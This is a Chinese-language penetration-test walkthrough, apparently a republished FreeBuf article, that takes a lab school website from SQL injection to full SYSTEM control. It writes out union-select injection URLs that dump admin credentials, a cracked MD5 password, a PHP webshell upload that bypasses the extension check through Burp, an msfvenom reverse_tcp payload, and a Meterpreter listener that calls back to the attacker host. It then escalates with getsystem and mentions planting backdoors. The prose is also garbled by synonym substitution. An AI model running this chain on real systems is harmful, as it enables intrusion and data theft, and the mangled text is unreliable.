序言
许多安全可靠人新进阶时,都须要在某一的试验场展开自学,那时胡先生给我们找了一则有关中文网站拿webshell的全数操作方式过程。总之了,该文中大部份的操作方式都是如前所述试验场展开了,爸爸妈妈能找有关的单元试验,但一千万不对真实世界的中文网站展开反击。
预备组织工作
舰载机(被反击方):win7控制系统
侵略者(反击方):win10控制系统、kali控制系统
具体来说开启win7控制系统,构筑两个常用的大学校园中文网站,接着态射到以太网,使他们能恒定出访。
从中文网站领到webshellsql转化成安全可靠漏洞
把整座中文网站下载完两遍后,他们辨认出这儿的url为?id=10开头,他们揣测可能将是两个sql转化成点。
具体来说他们在id=10前面加之两个下划线’展开推论。
那个这时候他们辨认出回显的统计数据不正常,只好他们再加两个注解记号。
辨认出统计数据那个这时候回显的这时候是恒定的,到这一步他们已经能确定这儿存在两个sql转化成安全可靠漏洞。
原理他们能简单解释一下 在中文网站中,他们一般使用统计数据库存储中文网站统计数据,中文网站和统计数据库是存在两个交互性。中文网站所呈现的内容是由代码中写入的sql语句调用统计数据库中的内容展开两个呈现,例如他们刚刚看到的文字。 而sql转化成安全可靠漏洞一般是由于程序员书写的sql语句不规范所导致的安全可靠事件。例如中文网站源码中使用如下的sql语句展开查询。
给语句开头的where查询条件加之两个下划线’。
很显然,他们传入的下划线和前面的下划线闭合,前面只有两个无法成对的下划线,接着报了语法错误。
那个这时候他们再加之–+注解记号注解掉前面的下划线。
那个这时候查询的统计数据就会正确回显出来。
原理简单解释了一下之后,他们回到刚刚的中文网站。
那个这时候他们辨认出存在sql转化成安全可靠漏洞之后,他们就开始展开查询对方中文网站统计数据库的统计数据,找到一些敏感信息,例如管理员的账号密码等等。
具体来说,他们使用order by语句快速猜解出表中的列数。
辨认出10列的这时候报错,说明不足10列,他们继续缩小范围。
再查询第8列的这时候,辨认出统计数据回显正确,说明对方表中含有列数8
他们使用union select 自定义查询试验一下,zhu意他们这儿前面的id=10,要写成id=-10,把这儿的查询置空。
辨认出会分别回显第三列、第五列和第七列。接下来他们就能在三、五、七处做做文章。
查询统计数据库名字:
http://192.168.1.167/yxlink/tuku/images.php?id=-10 union select 1,2,database(),4,5,6,7,8–+
得到统计数据库名字:qzn_zuiai
查询统计数据库中的表名:
http://192.168.1.167/yxlink/tuku/images.php?id=-10 union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_schema=”qzn_zuiai”–+
得到一共se2admin,se2fl,se2hd,se2nr,se2tufl,se2tunr,se2wz,se2zf,sj3sk九张表
通过表名,他们揣测se2admin可能将是存储管理员账号和密码的表,所以他们先查询这张表中的统计数据查询表se2admin中的字段:
http://192.168.1.167/yxlink/tuku/images.php?id=-10 union select 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_name=”se2admin”–+
得到表中的字段值有id,name,pass等,接下来他们查询name和pass的字段值。
查询字段值:
http://192.168.1.167/yxlink/tuku/images.php?id=-10 union select 1,2,name,4,pass,6,7,8 from se2admin–+
他们得到管理员账号:admin,管理员账号密码:
7fef6171469e80d32c0559f88b377245
很显然密码值是被加密的md5值,所以他们去网上找md5中文网站展开撞库查询。
得到管理员密码为:admin888
接下来他们须要查找那个中文网站的后台地址,他们使用御剑展开两个扫描。
御剑爆出了许多敏感地址,他们找到两个admin的目录,可能将是后台地址,他们去出访一下。
输入他们刚刚得到的管理员账号和密码admin:admin888。
那个这时候,他们成功进入对方中文网站后台。
文件上传安全可靠漏洞
接下来他们再这儿找到两个文件上传点。
他们写两个简单的一句话木马。
考虑到这儿可能将会对他们上传的文件展开两个后缀限制,例如只能上传jpg或者png图片格式文件等,所以他们把muma.txt改成muma.jpg格式。
他们开启burpsuite,接着点提交,拦截到他们发送的统计数据包。
他们把muma.jpg改回php文件类型:muma.php。
接着发送统计数据包。
ok,已经上传成功,他们去找找他们上传后的路径。
得到他们的上传完整路径为:http://192.168.1.167/yxlink/img/img_3699336993.php
他们使用蚁剑展开连接他们上传的木马。
成功连接,进入到对方服务器。
到此,已成功领到webshell。
反弹shell连接
接下来他们利用kali的msf制作两个exe类型的反弹型木马。
msfvenom -p windows/meterpreter/reverse_tcp LHOST=kali的ip LPORT=端口 -f 类型 -o 文件名
把做好的木马,通过他们蚁剑刚刚连接的webshell展开上传。
上传成功后,他们在kali开启msf。
执行监听
use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.131 set lport 4444 exploit
执行木马
msf开启监听之后,他们去蚁剑webshell执行他们上传的木马。
执行之后,回到kali,他们能看到msf目标正在回连,创建Meterpreter会话成功。
提权
具体来说查看一下他们的用户权限。
辨认出是普通用户权限,之前他们已经在webshell观察到对方是win7控制系统,所以他们采用的是windows的载荷反击
他们尝试使用getsystem展开提权试试。
辨认出直接提权成功,现在他们拥有windows最高权限system。
接下来他们打印一下控制系统信息,并且拍照对方电脑现在状态。
ok,成功。
结语
在领到system权限之后,他们能干许多许多的事…例如给对方种下后门,拿来当肉鸡等等… …
这告诉他们开发中文网站必须注重安全可靠,否则带来的后果是无穷大的。
作者:dotast 原文地址:https://www.freebuf.com/articles/web/290214.html再次声明:本头条号所分享内容仅用于网安爱好者之间的技术讨论,禁止用于违法途径,!否则需自行承担,本头条号及原作者不承担相应的后果.
